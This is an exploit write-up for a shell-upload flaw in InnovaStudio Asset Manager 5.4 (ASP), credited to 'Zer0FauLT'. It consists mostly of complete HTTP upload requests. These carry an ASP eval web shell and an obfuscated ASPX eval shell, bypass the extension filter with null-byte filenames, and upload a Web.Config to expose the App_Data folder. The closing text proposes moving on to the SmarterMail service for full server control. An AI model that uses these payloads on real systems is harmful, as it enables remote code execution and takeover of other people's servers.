InnovaStudio WYSIWYG Editor Asset Manager 5.4 Shell Upload – Torchsec
# Date: 11/04/2023
# Exploit Author: Zer0FauLT [admindeepsec@proton.me]
# Vendor Homepage: innovastudio.com
# Product: Asset Manager
# Version: <= Asset Manager ASP Version 5.4
# Tested on: Windows 10 and Windows Server 2019
# CVE : 0DAY
##################################################################################################
# #
# ASP version, in i_upload_object_FSO.asp, line 234 #
# #
# oUpload.AllowedTypes = "gif|jpg|png|wma|wmv|swf|doc|zip|pdf|txt" #
# #
##################################################################################################
||==============================================================================||
|| ((((1)))) ||
|| ||
|| ...:::We Trying Upload ASP-ASPX-PHP-CER-OTHER SHELL FILE EXTENSIONS:::... ||
||==============================================================================||
##################################################################################################
" "
" FILE PERMISSIONS : [ 0644 ] "
" "
" DIR PERMISSIONS : [ 0755 ] "
" "
" UPLOAD FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] "
" "
##################################################################################################
==================================================================================================
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"
C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="shell.asp"
Content-Type: application/octet-stream
<%eval request("#11")%>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
==================================================================================================
" ...[ RESPONCE ]... "
" "
" ASP-ASPX-PHP-CER-OTHER FILE EXTENSIONS to types is not allowed. "
" "
==================================================================================================
***
||================================================================================||
|| ((((2)))) ||
|| ||
|| ...:::Now we will manipulate the filename: ===>>> filename="shell.asp":::... ||
|| ||
||================================================================================||
##################################################################################################
" "
" FILE PERMISSIONS : [ 0644 ] "
" "
" DIR PERMISSIONS : [ 0755 ] "
" "
" UPLOAD FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] "
" "
##################################################################################################
==================================================================================================
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"
C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="shell.asp%00asp.txt"
Content-Type: application/octet-stream
<%eval request("#11")%>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
==================================================================================================
" >>> filename="shell.asp%00asp.txt" <<< "
" "
" [ %00 ] ===> We select these values > Right Click > Convert Selecetion > URL > URL-decode "
" "
" or "
" "
" CTRL+Shift+U "
" "
" SEND! "
" "
==================================================================================================
" ...[ RESPONCE ]... "
" "
" OK! "
" "
" UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets\shell.asp ] "
" "
" SHELL PATH: https://www.pentest.com/editor/assets/shell.asp/aspx/php/cer/[Unrestricted] "
" "
==================================================================================================
***
||==============================================================================||
|| ((((3)))) ||
|| ||
|| ...:::NO WRITE PERMISSION!:::... ||
|| ||
|| ...:::Directory Traversal:::... ||
|| ||
||==============================================================================||
##################################################################################################
" "
" FILE PERMISSIONS : [ 0600 ] "
" "
" DEFAULT DIR[\Editor\assets] PERMISSIONS : [ 0700 ] "
" "
" OTHER[App_Data] DIR PERMISSIONS : [ 0777 ] "
" "
" DEFAULT FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\Editor\assets ] "
" "
" App_Data FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data ] "
" "
" TEST WORK DIR : https://www.pentest.com/App_Data <<<= [ 404 ERROR - N/A ] "
" "
" "
##################################################################################################
##########################################################################################################################################################
# #
# What is the App_Data Folder useful? #
# App_Data contains application data files including .mdf database files, XML files, and other data store files. #
# The App_Data folder is used by ASP.NET to store an application's local database, such as the database for maintaining membership and role information. #
# The App_Data folder is not public like the other website directories under the Home Directory. #
# Because it's a private directory, the IIS server hides it for security reasons. #
# Now, we will test whether such a directory exists. #
# If the directory exists, we will make it public so that we can define the necessary server functions for running a shell within it. #
# For this we will try to load a special server configuration file. This is a Web.Config file. With this we'll ByPass the directory privacy. #
# So the directory will be public and it will be able to respond to external queries and run a shell. #
# #
##########################################################################################################################################################
==================================================================================================
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"
C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="Web.Config%00net.txt"
Content-Type: application/octet-stream
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
==================================================================================================
" ...[ RESPONCE ]... "
" "
" OK! "
" "
" UPLOADED FOLDER: [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\Web.Config ] "
" "
" TEST WORK for App_Data DIR : https://www.pentest.com/App_Data <<<= [ 403 ERROR - OK. ] "
" "
==================================================================================================
# Now we will upload your shell to the directory where we made ByPass. #
==================================================================================================
POST /editor/assetmanager/assetmanager.asp?ffilter=&upload=Y HTTP/2
Host: www.pentest.com
Cookie: ASPSESSIONIDAERARBRS=ENGPNMICKHLIBMPLFGAAHKAO; ASPSESSIONIDAQXADDBC=KNEFNGNCLJGEAJMBDLPEKOHD; ASPSESSIONIDAUTADDBC=LNEFNGNCNICEJMMILLBLEBJC; ASPSESSIONIDSWRCCBAC=AHEHHDOCIFOLGLNPFDOKLJOF; ASPSESSIONIDSERDABAB=NCHHDEOCFPENHJCJPKHKMONG
Content-Length: 473
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://www.pentest.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFo1Ek0VVUzPm1AxS
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://www.pentest.com/editor/assetmanager/assetmanager.asp
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpCurrFolder2"
C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="inpFilter"
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS
Content-Disposition: form-data; name="File1"; filename="shell.aspx%00aspx.txt"
Content-Type: application/octet-stream
<%@PAGE LANGUAGE=JSCRIPT EnableTheming = "False" StylesheetTheme="" Theme="" %>
<%var PAY:String=
Request["\x61\x62\x63\x64"];eval
(PAY,"\x75\x6E\x73\x61"+
"\x66\x65");%>
------WebKitFormBoundaryFo1Ek0VVUzPm1AxS--
======================================================================================================
" ...[ RESPONCE ]... "
" "
" OK! "
" "
" UPLOADED FOLDER : [ C:\Inetpub\vhosts\pentest.com\httpdocs\App_Data\shell.aspx ] "
" "
" TEST WORK for Shell : https://www.pentest.com/App_Data/shell.aspx <<<= [ OK. ] "
" "
==========================================================================================================================================
" "
" So what can we do if no directory on the site has write permission? "
" If not, we will test for vulnerabilities in the paths of other applications running on the server. "
" Sometimes this can be a mail service related vulnerability, "
" Sometimes also it can be a "Service Permissions" vulnerability. "
" Sometimes also it can be a "Binary Permissions " vulnerability. "
" Sometimes also it can be a "Weak Service Permissions" vulnerability. "
" Sometimes also it can be a "Unquoted Service Path" vulnerability. "
" Our limits are as much as our imagination... "
" *** 0DAY *** "
" Ok. Now we will strengthen our lesson by exemplifying a vulnerability in the SmarterMail service. "
" We saw that the SmarterMail service was installed on our IIS server and we detected a critical security vulnerability in this service. "
" TEST WORK for SmarterMail Service: [ http://mail.pentest.com/interface/root#/login ] "
" Data directory for this SmarterMail: [ C:\Program Files (x86)\SmarterTools\SmarterMail\MRS\App_Data ] "
" As shown above, we can first navigate to the App_Data directory belonging to the SmarterMail service, "
" And then upload our shell file to the server by bypassing it. "
" This way, we will have full control over both the server and the mail service. "
" Shell Path: [ http://mail.pentest.com/App_Data/shell.aspx ] "
" "
==========================================================================================================================================
Gloss